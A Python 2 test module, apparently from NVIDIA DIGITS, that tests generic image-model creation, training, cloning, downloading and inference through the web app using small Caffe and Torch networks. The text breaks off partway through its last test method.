from bs4 import BeautifulSoup
from digits import extensions
from digits.config import config_value
import digits.dataset.images.generic.test_views
import digits.dataset.generic.test_views
import digits.test_views
from digits import test_utils
import digits.webapp
# May be too short on a slow system
TIMEOUT_DATASET = 45
TIMEOUT_MODEL = 60
################################################################################
# Base classes (they don't start with "Test" so nose won't run them)
################################################################################
class BaseViewsTest(digits.test_views.BaseViewsTest):
"""
Provides some functions
"""
CAFFE_NETWORK = \
"""
layer {
name: "scale"
type: "Power"
bottom: "data"
top: "scale"
power_param {
scale: 0.004
}
}
layer {
name: "hidden"
type: "InnerProduct"
bottom: "scale"
top: "output"
inner_product_param {
num_output: 2
}
}
layer {
name: "loss"
type: "EuclideanLoss"
bottom: "output"
bottom: "label"
top: "loss"
exclude { stage: "deploy" }
}
"""
TORCH_NETWORK = \
"""
return function(p)
local nDim = 1
if p.inputShape then p.inputShape:apply(function(x) nDim=nDim*x end) end
local net = nn.Sequential()
net:add(nn.MulConstant(0.004))
net:add(nn.View(-1):setNumInputDims(3)) -- flatten
-- set all weights and biases to zero as this speeds learning up
-- for the type of problem we're trying to solve in this test
local linearLayer = nn.Linear(nDim, 2)
linearLayer.weight:fill(0)
linearLayer.bias:fill(0)
net:add(linearLayer) -- c*h*w -> 2
return {
model = net,
loss = nn.MSECriterion(),
}
end
"""
@classmethod
def model_exists(cls, job_id):
return cls.job_exists(job_id, 'models')
@classmethod
def model_status(cls, job_id):
return cls.job_status(job_id, 'models')
@classmethod
def abort_model(cls, job_id):
return cls.abort_job(job_id, job_type='models')
@classmethod
def model_wait_completion(cls, job_id, **kwargs):
kwargs['job_type'] = 'models'
if 'timeout' not in kwargs:
kwargs['timeout'] = TIMEOUT_MODEL
return cls.job_wait_completion(job_id, **kwargs)
@classmethod
def delete_model(cls, job_id):
return cls.delete_job(job_id, job_type='models')
@classmethod
def network(cls):
return cls.TORCH_NETWORK if cls.FRAMEWORK == 'torch' else cls.CAFFE_NETWORK
class BaseViewsTestWithAnyDataset(BaseViewsTest):
"""
Provides a dataset
This is a common interface to work with either "images/generic"
datasets or "generic" datasets. The dataset type to use is chosen
further down in the class hierarchy, see e.g. BaseViewsTestWithDataset
"""
# Inherited classes may want to override these attributes
CROP_SIZE = None
TRAIN_EPOCHS = 3
LR_POLICY = None
LEARNING_RATE = None
BATCH_SIZE = 10
@classmethod
def setUpClass(cls, **kwargs):
super(BaseViewsTestWithAnyDataset, cls).setUpClass(**kwargs)
cls.created_models = []
@classmethod
def tearDownClass(cls):
# delete any created datasets
for job_id in cls.created_models:
cls.delete_model(job_id)
super(BaseViewsTestWithAnyDataset, cls).tearDownClass()
@classmethod
def create_model(cls, learning_rate=None, **kwargs):
"""
Create a model
Returns the job_id
Raise RuntimeError if job fails to create
Keyword arguments:
**kwargs -- data to be sent with POST request
"""
if learning_rate is None:
learning_rate = cls.LEARNING_RATE
data = {
'model_name': 'test_model',
'group_name': 'test_group',
'dataset': cls.dataset_id,
'method': 'custom',
'custom_network': cls.network(),
'batch_size': cls.BATCH_SIZE,
'train_epochs': cls.TRAIN_EPOCHS,
'random_seed': 0xCAFEBABE,
'framework': cls.FRAMEWORK,
}
if cls.CROP_SIZE is not None:
data['crop_size'] = cls.CROP_SIZE
if cls.LR_POLICY is not None:
data['lr_policy'] = cls.LR_POLICY
if learning_rate is not None:
data['learning_rate'] = learning_rate
data.update(kwargs)
request_json = data.pop('json', False)
url = '/models/images/generic'
if request_json:
url += '.json'
rv = cls.app.post(url, data=data)
if request_json:
if rv.status_code != 200:
print json.loads(rv.data)
raise RuntimeError('Model creation failed with %s' % rv.status_code)
data = json.loads(rv.data)
if 'jobs' in data.keys():
return [j['id'] for j in data['jobs']]
else:
return data['id']
# expect a redirect
if not 300 <= rv.status_code <= 310:
print 'Status code:', rv.status_code
s = BeautifulSoup(rv.data, 'html.parser')
div = s.select('div.alert-danger')
if div:
print div[0]
else:
print rv.data
raise RuntimeError('Failed to create dataset - status %s' % rv.status_code)
job_id = cls.job_id_from_response(rv)
assert cls.model_exists(job_id), 'model not found after successful creation'
cls.created_models.append(job_id)
return job_id
class BaseViewsTestWithDataset(BaseViewsTestWithAnyDataset,
digits.dataset.images.generic.test_views.BaseViewsTestWithDataset):
"""
This inherits from BaseViewsTestWithAnyDataset and
digits.dataset.images.generic.test_views.BaseViewsTestWithDataset
in order to provide an interface to test models on "images/generic" datasets
"""
pass
class BaseViewsTestWithModelWithAnyDataset(BaseViewsTestWithAnyDataset):
"""
Provides a model
"""
@classmethod
def setUpClass(cls, **kwargs):
use_mean = kwargs.pop('use_mean', None)
super(BaseViewsTestWithModelWithAnyDataset, cls).setUpClass(**kwargs)
cls.model_id = cls.create_model(json=True, use_mean=use_mean)
assert cls.model_wait_completion(cls.model_id) == 'Done', 'create failed'
class BaseTestViews(BaseViewsTest):
"""
Tests which don't require a dataset or a model
"""
def test_page_model_new(self):
rv = self.app.get('/models/images/generic/new')
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
assert 'New Image Model' in rv.data, 'unexpected page format'
def test_nonexistent_model(self):
assert not self.model_exists('foo'), "model shouldn't exist"
def test_view_config(self):
extension = extensions.view.get_default_extension()
rv = self.app.get('/models/view-config/%s' % extension.get_id())
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
def test_visualize_network(self):
rv = self.app.post('/models/visualize-network?framework=' + self.FRAMEWORK,
data={'custom_network': self.network()}
)
s = BeautifulSoup(rv.data, 'html.parser')
body = s.select('body')
if rv.status_code != 200:
body = s.select('body')[0]
if 'InvocationException' in str(body):
raise unittest.SkipTest('GraphViz not installed')
raise AssertionError('POST failed with %s\n\n%s' % (rv.status_code, body))
image = s.select('img')
assert image is not None, "didn't return an image"
class BaseTestCreation(BaseViewsTestWithDataset):
"""
Model creation tests
"""
def test_create_json(self):
job_id = self.create_model(json=True)
self.abort_model(job_id)
def test_create_delete(self):
job_id = self.create_model()
assert self.delete_model(job_id) == 200, 'delete failed'
assert not self.model_exists(job_id), 'model exists after delete'
def test_create_wait_delete(self):
job_id = self.create_model()
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
assert self.delete_model(job_id) == 200, 'delete failed'
assert not self.model_exists(job_id), 'model exists after delete'
def test_create_abort_delete(self):
job_id = self.create_model()
assert self.abort_model(job_id) == 200, 'abort failed'
assert self.delete_model(job_id) == 200, 'delete failed'
assert not self.model_exists(job_id), 'model exists after delete'
def test_snapshot_interval_2(self):
job_id = self.create_model(snapshot_interval=0.5)
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
rv = self.app.get('/models/%s.json' % job_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert len(content['snapshots']) > 1, 'should take >1 snapshot'
def test_snapshot_interval_0_5(self):
job_id = self.create_model(train_epochs=4, snapshot_interval=2)
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
rv = self.app.get('/models/%s.json' % job_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert len(content['snapshots']) == 2, 'should take 2 snapshots'
@unittest.skipIf(
not config_value('gpu_list'),
'no GPUs selected')
@unittest.skipIf(
not config_value('caffe')['cuda_enabled'],
'CUDA disabled')
@unittest.skipIf(
config_value('caffe')['multi_gpu'],
'multi-GPU enabled')
def test_select_gpu(self):
for index in config_value('gpu_list').split(','):
yield self.check_select_gpu, index
def check_select_gpu(self, gpu_index):
job_id = self.create_model(select_gpu=gpu_index)
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
@unittest.skipIf(
not config_value('gpu_list'),
'no GPUs selected')
@unittest.skipIf(
not config_value('caffe')['cuda_enabled'],
'CUDA disabled')
@unittest.skipIf(
not config_value('caffe')['multi_gpu'],
'multi-GPU disabled')
def test_select_gpus(self):
# test all possible combinations
gpu_list = config_value('gpu_list').split(',')
for i in xrange(len(gpu_list)):
for combination in itertools.combinations(gpu_list, i + 1):
yield self.check_select_gpus, combination
def check_select_gpus(self, gpu_list):
job_id = self.create_model(select_gpus_list=','.join(gpu_list), batch_size=len(gpu_list))
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
def infer_one_for_job(self, job_id):
# carry out one inference test per category in dataset
image_path = os.path.join(self.imageset_folder, self.test_image)
with open(image_path, 'rb') as infile:
# StringIO wrapping is needed to simulate POST file upload.
image_upload = (StringIO(infile.read()), 'image.png')
rv = self.app.post(
'/models/images/generic/infer_one?job_id=%s' % job_id,
data={
'image_file': image_upload,
'show_visualizations': 'y',
}
)
s = BeautifulSoup(rv.data, 'html.parser')
body = s.select('body')
assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, body)
def test_infer_one_mean_image(self):
# test the creation
job_id = self.create_model(use_mean='image')
assert self.model_wait_completion(job_id) == 'Done', 'job failed'
self.infer_one_for_job(job_id)
def test_infer_one_mean_pixel(self):
# test the creation
job_id = self.create_model(use_mean='pixel')
assert self.model_wait_completion(job_id) == 'Done', 'job failed'
self.infer_one_for_job(job_id)
def test_infer_one_mean_none(self):
# test the creation
job_id = self.create_model(use_mean='none')
assert self.model_wait_completion(job_id) == 'Done', 'job failed'
self.infer_one_for_job(job_id)
def test_retrain(self):
job1_id = self.create_model()
assert self.model_wait_completion(job1_id) == 'Done', 'first job failed'
rv = self.app.get('/models/%s.json' % job1_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert len(content['snapshots']), 'should have at least snapshot'
options = {
'method': 'previous',
'previous_networks': job1_id,
}
options['%s-snapshot' % job1_id] = content['snapshots'][-1]
job2_id = self.create_model(**options)
assert self.model_wait_completion(job2_id) == 'Done', 'second job failed'
def test_retrain_twice(self):
# retrain from a job which already had a pretrained model
job1_id = self.create_model()
assert self.model_wait_completion(job1_id) == 'Done', 'first job failed'
rv = self.app.get('/models/%s.json' % job1_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert len(content['snapshots']), 'should have at least snapshot'
options_2 = {
'method': 'previous',
'previous_networks': job1_id,
}
options_2['%s-snapshot' % job1_id] = content['snapshots'][-1]
job2_id = self.create_model(**options_2)
assert self.model_wait_completion(job2_id) == 'Done', 'second job failed'
options_3 = {
'method': 'previous',
'previous_networks': job2_id,
}
options_3['%s-snapshot' % job2_id] = -1
job3_id = self.create_model(**options_3)
assert self.model_wait_completion(job3_id) == 'Done', 'third job failed'
def test_diverging_network(self):
if self.FRAMEWORK == 'caffe':
raise unittest.SkipTest('Test not implemented for Caffe')
job_id = self.create_model(json=True, learning_rate=1e15)
assert self.model_wait_completion(job_id) == 'Error', 'job should have failed'
job_info = self.job_info_html(job_id=job_id, job_type='models')
assert 'Try decreasing your learning rate' in job_info
def test_clone(self):
options_1 = {
'shuffle': True,
'lr_step_size': 33.0,
'previous_networks': 'None',
'lr_inv_power': 0.5,
'lr_inv_gamma': 0.1,
'lr_poly_power': 3.0,
'lr_exp_gamma': 0.95,
'use_mean': 'image',
'custom_network_snapshot': '',
'lr_multistep_gamma': 0.5,
'lr_policy': 'step',
'crop_size': None,
'val_interval': 3.0,
'random_seed': 123,
'learning_rate': 0.01,
'standard_networks': 'None',
'lr_step_gamma': 0.1,
'lr_sigmoid_step': 50.0,
'lr_sigmoid_gamma': 0.1,
'lr_multistep_values': '50,85',
'solver_type': 'SGD',
}
job1_id = self.create_model(**options_1)
assert self.model_wait_completion(job1_id) == 'Done', 'first job failed'
rv = self.app.get('/models/%s.json' % job1_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content1 = json.loads(rv.data)
# Clone job1 as job2
options_2 = {
'clone': job1_id,
}
job2_id = self.create_model(**options_2)
assert self.model_wait_completion(job2_id) == 'Done', 'second job failed'
rv = self.app.get('/models/%s.json' % job2_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content2 = json.loads(rv.data)
# These will be different
content1.pop('id')
content2.pop('id')
content1.pop('directory')
content2.pop('directory')
content1.pop('creation time')
content2.pop('creation time')
content1.pop('job id')
content2.pop('job id')
assert (content1 == content2), 'job content does not match'
job1 = digits.webapp.scheduler.get_job(job1_id)
job2 = digits.webapp.scheduler.get_job(job2_id)
assert (job1.form_data == job2.form_data), 'form content does not match'
class BaseTestCreatedWithAnyDataset(BaseViewsTestWithModelWithAnyDataset):
"""
Tests on a model that has already been created
"""
def test_save(self):
job = digits.webapp.scheduler.get_job(self.model_id)
assert job.save(), 'Job failed to save'
def test_get_snapshot(self):
job = digits.webapp.scheduler.get_job(self.model_id)
task = job.train_task()
f = task.get_snapshot(-1)
assert f, "Failed to load snapshot"
filename = task.get_snapshot_filename(-1)
assert filename, "Failed to get filename"
def test_download(self):
for extension in ['tar', 'zip', 'tar.gz', 'tar.bz2']:
yield self.check_download, extension
def check_download(self, extension):
url = '/models/%s/download.%s' % (self.model_id, extension)
rv = self.app.get(url)
assert rv.status_code == 200, 'download "%s" failed with %s' % (url, rv.status_code)
def test_index_json(self):
rv = self.app.get('/index.json')
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
content = json.loads(rv.data)
found = False
for m in content['models']:
if m['id'] == self.model_id:
found = True
break
assert found, 'model not found in list'
def test_model_json(self):
rv = self.app.get('/models/%s.json' % self.model_id)
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert content['id'] == self.model_id, 'expected different job_id'
assert len(content['snapshots']) > 0, 'no snapshots in list'
def test_edit_name(self):
status = self.edit_job(
self.dataset_id,
name='new name'
)
assert status == 200, 'failed with %s' % status
def test_edit_notes(self):
status = self.edit_job(
self.dataset_id,
notes='new notes'
)
assert status == 200, 'failed with %s' % status
def test_infer_one(self):
image_path = os.path.join(self.imageset_folder, self.test_image)
with open(image_path, 'rb') as infile:
# StringIO wrapping is needed to simulate POST file upload.
image_upload = (StringIO(infile.read()), 'image.png')
rv = self.app.post(
'/models/images/generic/infer_one?job_id=%s' % self.model_id,
data={
'image_file': image_upload,
'show_visualizations': 'y',
}
)
s = BeautifulSoup(rv.data, 'html.parser')
body = s.select('body')
assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, body)
def test_infer_one_json(self):
image_path = os.path.join(self.imageset_folder, self.test_image)
with open(image_path, 'rb') as infile:
# StringIO wrapping is needed to simulate POST file upload.
image_upload = (StringIO(infile.read()), 'image.png')
rv = self.app.post(
'/models/images/generic/infer_one.json?job_id=%s' % self.model_id,
data={
'image_file': image_upload,
}
)
assert rv.status_code == 200, 'POST failed with %s' % rv.status_code
data = json.loads(rv.data)
assert data['outputs']['output'][0][0] > 0 and \
data['outputs']['output'][0][1] > 0, \
'image regression result is wrong: %s' % data['outputs']['output']
def test_infer_many(self):
# use the same image twice to make a list of two images
textfile_images = '%s\n%s\n' % (self.test_image, self.test_image)
# StringIO wrapping is needed to simulate POST file upload.
file_upload = (StringIO(textfile_images), 'images.txt')
rv = self.app.post(
'/models/images/generic/infer_many?job_id=%s' % self.model_id,
data={'image_list': file_upload}
)
s = BeautifulSoup(rv.data, 'html.parser')
body = s.select('body')
assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, body)
headers = s.select('table.table th')
assert headers is not None, 'unrecognized page format'
def test_infer_db(self):
if self.val_db_path is None:
raise unittest.SkipTest('Class has no validation db')
rv = self.app.post(
'/models/images/generic/infer_db?job_id=%s' % self.model_id,
data={'db_path': self.val_db_path}
)
s = BeautifulSoup(rv.data, 'html.parser')
body = s.select('body')
assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, body)
headers = s.select('table.table th')
assert headers is not None, 'unrecognized page format'
def test_infer_many_from_folder(self):
textfile_images = '%s\n' % os.path.basename(self.test_image)
# StringIO wrapping is needed to simulate POST file upload.
file_upload = (StringIO(textfile_images), 'images.txt')
# try selecting the extension explicitly
extension = extensions.view.get_default_extension()
extension_id = extension.get_id()
rv = self.app.post(
'/models/images/generic/infer_many?job_id=%s' % self.model_id,
data={'image_list': file_upload,
'image_folder': os.path.dirname(self.test_image),
'view_extension_id': extension_id}
)
s = BeautifulSoup(rv.data, 'html.parser')
body = s.select('body')
assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, body)
headers = s.select('table.table th')
assert headers is not None, 'unrecognized page format'
def test_infer_many_json(self):
textfile_images = '%s\n' % self.test_image
# StringIO wrapping is needed to simulate POST file upload.
file_upload = (StringIO(textfile_images), 'images.txt')
rv = self.app.post(
'/models/images/generic/infer_many.json?job_id=%s' % self.model_id,
data={'image_list': file_upload}
)
assert rv.status_code == 200, 'POST failed with %s' % rv.status_code
data = json.loads(rv.data)
assert 'outputs' in data, 'invalid response'
def test_infer_db_json(self):
if self.val_db_path is None:
raise unittest.SkipTest('Class has no validation db')
rv = self.app.post(
'/models/images/generic/infer_db.json?job_id=%s' % self.model_id,
data={'db_path': self.val_db_path}
)
assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, rv.data)
data = json.loads(rv.data)
assert 'outputs' in data, 'invalid response'
class BaseTestCreated(BaseTestCreatedWithAnyDataset,
digits.dataset.images.generic.test_views.BaseViewsTestWithDataset):
"""
Tests on a model that has already been created with an "images/generic" dataset
"""
pass
class BaseTestCreatedWithGradientDataExtension(BaseTestCreatedWithAnyDataset,
digits.dataset.generic.test_views.BaseViewsTestWithDataset):
"""
Tests on a model that has already been created with a "generic" dataset,
using the gradients extension in that instance
"""
EXTENSION_ID = "image-gradients"
@classmethod
def setUpClass(cls, **kwargs):
if not hasattr(cls, 'imageset_folder'):
# Create test image
cls.imageset_folder = tempfile.mkdtemp()
image_width = cls.IMAGE_WIDTH
image_height = cls.IMAGE_HEIGHT
yy, xx = np.mgrid[:image_height,
:image_width].astype('float')
xslope, yslope = 0.5, 0.5
a = xslope * 255 / image_width
b = yslope * 255 / image_height
test_image = a * (xx - image_width / 2) + b * (yy - image_height / 2) + 127.5
test_image = test_image.astype('uint8')
pil_img = PIL.Image.fromarray(test_image)
cls.test_image = os.path.join(cls.imageset_folder, 'test.png')
pil_img.save(cls.test_image)
# note: model created in BaseTestCreatedWithAnyDataset.setUpClass method
super(BaseTestCreatedWithGradientDataExtension, cls).setUpClass()
def test_infer_extension_json(self):
rv = self.app.post(
'/models/images/generic/infer_extension.json?job_id=%s' % self.model_id,
data={
'gradient_x': 0.5,
'gradient_y': -0.5,
}
)
assert rv.status_code == 200, 'POST failed with %s' % rv.status_code
data = json.loads(rv.data)
output = data['outputs'][data['outputs'].keys()[0]]['output']
assert output[0] > 0 and \
output[1] < 0, \
'image regression result is wrong: %s' % data['outputs']['output']
class BaseTestCreatedWithImageProcessingExtension(
BaseTestCreatedWithAnyDataset,
digits.dataset.generic.test_views.BaseViewsTestWithDataset):
"""
Test Image processing extension with a dummy identity network
"""
CAFFE_NETWORK = \
"""
layer {
name: "identity"
type: "Power"
bottom: "data"
top: "output"
}
layer {
name: "loss"
type: "EuclideanLoss"
bottom: "output"
bottom: "label"
top: "loss"
exclude { stage: "deploy" }
}
"""
TORCH_NETWORK = \
"""
return function(p)
return {
-- simple identity network
model = nn.Sequential():add(nn.Identity()),
loss = nn.MSECriterion(),
}
end
"""
EXTENSION_ID = "image-processing"
VARIABLE_SIZE_DATASET = False
NUM_IMAGES = 100
MEAN = 'none'
@classmethod
def setUpClass(cls, **kwargs):
if cls.VARIABLE_SIZE_DATASET:
cls.BATCH_SIZE = 1
cls.create_variable_size_random_imageset(
num_images=cls.NUM_IMAGES)
else:
cls.create_random_imageset(
num_images=cls.NUM_IMAGES,
image_width=cls.IMAGE_WIDTH,
image_height=cls.IMAGE_HEIGHT)
super(BaseTestCreatedWithImageProcessingExtension, cls).setUpClass(
feature_folder=cls.imageset_folder,
label_folder=cls.imageset_folder,
channel_conversion='L',
dsopts_force_same_shape='0' if cls.VARIABLE_SIZE_DATASET else '1',
use_mean=cls.MEAN)
def test_infer_one_json(self):
image_path = os.path.join(self.imageset_folder, self.test_image)
with open(image_path, 'rb') as infile:
# StringIO wrapping is needed to simulate POST file upload.
image_upload = (StringIO(infile.read()), 'image.png')
rv = self.app.post(
'/models/images/generic/infer_one.json?job_id=%s' % self.model_id,
data={'image_file': image_upload}
)
assert rv.status_code == 200, 'POST failed with %s' % rv.status_code
data = json.loads(rv.data)
data_shape = np.array(data['outputs']['output']).shape
if not self.VARIABLE_SIZE_DATASET:
assert data_shape == (1, self.CHANNELS, self.IMAGE_WIDTH, self.IMAGE_HEIGHT)
def test_infer_one_noresize_json(self):
# create large random image
shape = (self.CHANNELS, 10 * self.IMAGE_HEIGHT, 5 * self.IMAGE_WIDTH)
x = np.random.randint(
low=0,
high=256,
size=shape)
if self.CHANNELS == 1:
# drop channel dimension
x = x[0]
x = x.astype('uint8')
pil_img = PIL.Image.fromarray(x)
# create output stream
s = StringIO()
pil_img.save(s, format="png")
# create input stream
s = StringIO(s.getvalue())
image_upload = (s, 'image.png')
# post request
rv = self.app.post(
'/models/images/generic/infer_one.json?job_id=%s' % self.model_id,
data={'image_file': image_upload, 'dont_resize': 'y'}
)
assert rv.status_code == 200, 'POST failed with %s' % rv.status_code
data = json.loads(rv.data)
data_shape = np.array(data['outputs']['output']).shape
assert data_shape == (1,) + shape
def test_infer_db(self):
if self.VARIABLE_SIZE_DATASET:
raise unittest.SkipTest('Skip variable-size inference test')
super(BaseTestCreatedWithImageProcessingExtension, self).test_infer_db()
def test_infer_db_json(self):
if self.VARIABLE_SIZE_DATASET:
raise unittest.SkipTest('Skip variable-size inference test')
super(BaseTestCreatedWithImageProcessingExtension, self).test_infer_db_json()
class BaseTestDatasetModelInteractions(BaseViewsTestWithDataset):
"""
Test the interactions between datasets and models
"""
# If you try to create a model using a deleted dataset, it should fail
def test_create_model_deleted_dataset(self):
dataset_id = self.create_dataset()
assert self.delete_dataset(dataset_id) == 200, 'delete failed'
assert not self.dataset_exists(dataset_id), 'dataset exists after delete'
try:
self.create_model(dataset=dataset_id)
except RuntimeError:
return
assert False, 'Should have failed'
# If you try to create a model using a running dataset,
# it should wait to start until the dataset is completed
def test_create_model_running_dataset(self):
dataset_id = self.create_dataset()
model_id = self.create_model(dataset=dataset_id)
# Model should be in WAIT status while dataset is running
# Copying functionality from job_wait_completion ...
start_time = time.time()
timeout = TIMEOUT_DATASET
dataset_status = self.dataset_status(dataset_id)
while dataset_status != 'Done':
model_status = self.model_status(model_id)
if model_status == 'Initialized':
# give it some time ...
pass
elif model_status == 'Waiting':
# That's what we were waiting for
break
else:
raise Exception('Model not waiting - "%s"' % model_status)
assert (time.time() - start_time) < timeout, 'Job took more than %s seconds' % timeout
time.sleep(0.5)
dataset_status = self.dataset_status(dataset_id)
# Model should switch to RUN status after dataset is DONE
assert self.dataset_wait_completion(dataset_id) == 'Done', 'dataset creation failed'
time.sleep(1)
assert self.model_status(model_id) in ['Running', 'Done'], "model didn't start"
self.abort_model(model_id)
# If you try to delete a completed dataset with a dependent model, it should fail
def test_delete_dataset_dependent_model(self):
dataset_id = self.create_dataset()
model_id = self.create_model(dataset=dataset_id)
assert self.dataset_wait_completion(dataset_id) == 'Done', 'dataset creation failed'
assert self.delete_dataset(dataset_id) == 403, 'dataset deletion should not have succeeded'
self.abort_model(model_id)
# If you try to delete a running dataset with a dependent model, it should fail
def test_delete_running_dataset_dependent_model(self):
dataset_id = self.create_dataset()
model_id = self.create_model(dataset=dataset_id)
assert self.delete_dataset(dataset_id) == 403, 'dataset deletion should not have succeeded'
self.abort_dataset(dataset_id)
self.abort_model(model_id)
class BaseTestCreatedCropInNetwork(BaseTestCreated):
CAFFE_NETWORK = \
"""
layer {
name: "data"
type: "Data"
top: "data"
include {
phase: TRAIN
}
transform_param {
crop_size: 8
}
}
layer {
name: "data"
type: "Data"
top: "data"
include {
phase: TEST
}
transform_param {
crop_size: 8
}
}
layer {
name: "scale"
type: "Power"
bottom: "data"
top: "scale"
power_param {
scale: 0.004
}
}
layer {
name: "hidden"
type: "InnerProduct"
bottom: "scale"
top: "output"
inner_product_param {
num_output: 2
}
}
layer {
name: "loss"
type: "EuclideanLoss"
bottom: "output"
bottom: "label"
top: "loss"
exclude { stage: "deploy" }
}
"""
TORCH_NETWORK = \
"""
return function(p)
local croplen = 8, channels
if p.inputShape then channels=p.inputShape[1] else channels=1 end
local net = nn.Sequential()
net:add(nn.MulConstant(0.004))
net:add(nn.View(-1):setNumInputDims(3)) -- flatten
-- set all weights and biases to zero as this speeds learning up
-- for the type of problem we're trying to solve in this test
local linearLayer = nn.Linear(channels*croplen*croplen, 2)
linearLayer.weight:fill(0)
linearLayer.bias:fill(0)
net:add(linearLayer) -- c*croplen*croplen -> 2
return {
model = net,
loss = nn.MSECriterion(),
croplen = croplen
}
end
"""
class BaseTestCreatedCropInForm(BaseTestCreated):
CROP_SIZE = 8
################################################################################
# Test classes
################################################################################
class TestCaffeViews(BaseTestViews, test_utils.CaffeMixin):
pass
class TestCaffeCreation(BaseTestCreation, test_utils.CaffeMixin):
pass
class TestCaffeCreated(BaseTestCreated, test_utils.CaffeMixin):
pass
class TestCaffeCreatedWithGradientDataExtension(
BaseTestCreatedWithGradientDataExtension, test_utils.CaffeMixin):
pass
class TestCaffeCreatedWithGradientDataExtensionNoValSet(
BaseTestCreatedWithGradientDataExtension, test_utils.CaffeMixin):
@classmethod
def setUpClass(cls):
super(TestCaffeCreatedWithGradientDataExtensionNoValSet, cls).setUpClass(val_image_count=0)
class TestCaffeCreatedWithImageProcessingExtensionMeanImage(
BaseTestCreatedWithImageProcessingExtension, test_utils.CaffeMixin):
MEAN = 'image'
class TestCaffeCreatedWithImageProcessingExtensionMeanPixel(
BaseTestCreatedWithImageProcessingExtension, test_utils.CaffeMixin):
MEAN = 'pixel'
class TestCaffeCreatedWithImageProcessingExtensionMeanNone(
BaseTestCreatedWithImageProcessingExtension, test_utils.CaffeMixin):
MEAN = 'none'
class TestCaffeCreatedVariableSizeDataset(
BaseTestCreatedWithImageProcessingExtension, test_utils.CaffeMixin):
MEAN = 'none'
VARIABLE_SIZE_DATASET = True
class TestCaffeDatasetModelInteractions(BaseTestDatasetModelInteractions, test_utils.CaffeMixin):
pass
class TestCaffeCreatedCropInNetwork(BaseTestCreatedCropInNetwork, test_utils.CaffeMixin):
pass
class TestCaffeCreatedCropInForm(BaseTestCreatedCropInForm, test_utils.CaffeMixin):
pass
class TestTorchViews(BaseTestViews, test_utils.TorchMixin):
pass
class TestTorchCreation(BaseTestCreation, test_utils.TorchMixin):
pass
class TestTorchCreated(BaseTestCreated, test_utils.TorchMixin):
pass
class TestTorchCreatedWithGradientDataExtension(
BaseTestCreatedWithGradientDataExtension, test_utils.TorchMixin):
pass
class TestTorchCreatedWithGradientDataExtensionNoValSet(
BaseTestCreatedWithGradientDataExtension, test_utils.TorchMixin):
@classmethod
def setUpClass(cls):
super(TestTorchCreatedWithGradientDataExtensionNoValSet, cls).setUpClass(val_image_count=0)
class TestTorchCreatedWithImageProcessingExtensionMeanImage(
BaseTestCreatedWithImageProcessingExtension, test_utils.TorchMixin):
MEAN = 'image'
class TestTorchCreatedWithImageProcessingExtensionMeanPixel(
BaseTestCreatedWithImageProcessingExtension, test_utils.TorchMixin):
MEAN = 'pixel'
class TestTorchCreatedWithImageProcessingExtensionMeanNone(
BaseTestCreatedWithImageProcessingExtension, test_utils.TorchMixin):
MEAN = 'none'
class TestTorchCreatedVariableSizeDataset(
BaseTestCreatedWithImageProcessingExtension, test_utils.TorchMixin):
MEAN = 'none'
VARIABLE_SIZE_DATASET = True
class TestTorchCreatedCropInNetwork(BaseTestCreatedCropInNetwork, test_utils.TorchMixin):
pass
class TestTorchCreatedCropInForm(BaseTestCreatedCropInForm, test_utils.TorchMixin):
pass
class TestTorchDatasetModelInteractions(BaseTestDatasetModelInteractions, test_utils.TorchMixin):
pass
class TestTorchTableOutput(BaseTestCreated, test_utils.TorchMixin):
TORCH_NETWORK = \
"""
return function(p)
-- same network as in class BaseTestCreated except that each gradient
-- is learnt separately: the input is fed into nn.ConcatTable and
-- each branch outputs one of the gradients
local nDim = 1
if p.inputShape then p.inputShape:apply(function(x) nDim=nDim*x end) end
local net = nn.Sequential()
net:add(nn.MulConstant(0.004))
net:add(nn.View(-1):setNumInputDims(3)) -- flatten
-- set all weights and biases to zero as this speeds learning up
-- for the type of problem we're trying to solve in this test
local linearLayer1 = nn.Linear(nDim, 1)
linearLayer1.weight:fill(0)
linearLayer1.bias:fill(0)
local linearLayer2 = nn.Linear(nDim, 1)
linearLayer2.weight:fill(0)
linearLayer2.bias:fill(0)
-- create concat table
local parallel = nn.ConcatTable()
parallel:add(linearLayer1):add(linearLayer2)
net:add(parallel)
-- create two MSE criteria to optimize each gradient separately
local mse1 = nn.MSECriterion()
local mse2 = nn.MSECriterion()
-- now create a criterion that takes as input each of the two criteria
local finalCriterion = nn.ParallelCriterion(false):add(mse1):add(mse2)
-- create label hook
function labelHook(input, dblabel)
-- split label alongside 2nd dimension
local labelTable = dblabel:split(1,2)
return labelTable
end
return {
model = net,
loss = finalCriterion,
labelHook = labelHook,
}
end
"""
class TestTorchNDOutput(BaseTestCreated, test_utils.TorchMixin):
CROP_SIZE = 8
TORCH_NETWORK = \
"""
return function(p)
-- this model just forwards the input as is
local net = nn.Sequential():add(nn.Identity())
-- create label hook
function labelHook(input, dblabel)
return input
end
return {
model = net,
loss = nn.AbsCriterion(),
labelHook = labelHook,
}
end
"""
def test_infer_one_json(self):
image_path = os.path.join(self.imageset_folder, self.test_image)
with open(image_path, 'rb') as infile:
# StringIO wrapping is needed to simulate POST file upload.
image_upload = (StringIO(infile.read()), 'image.png')
rv = self.app.post(
'/models/images/generic/infer_one.json?job_id=%s' % self.model_id,
data={
'image_file': image_upload,
}
)
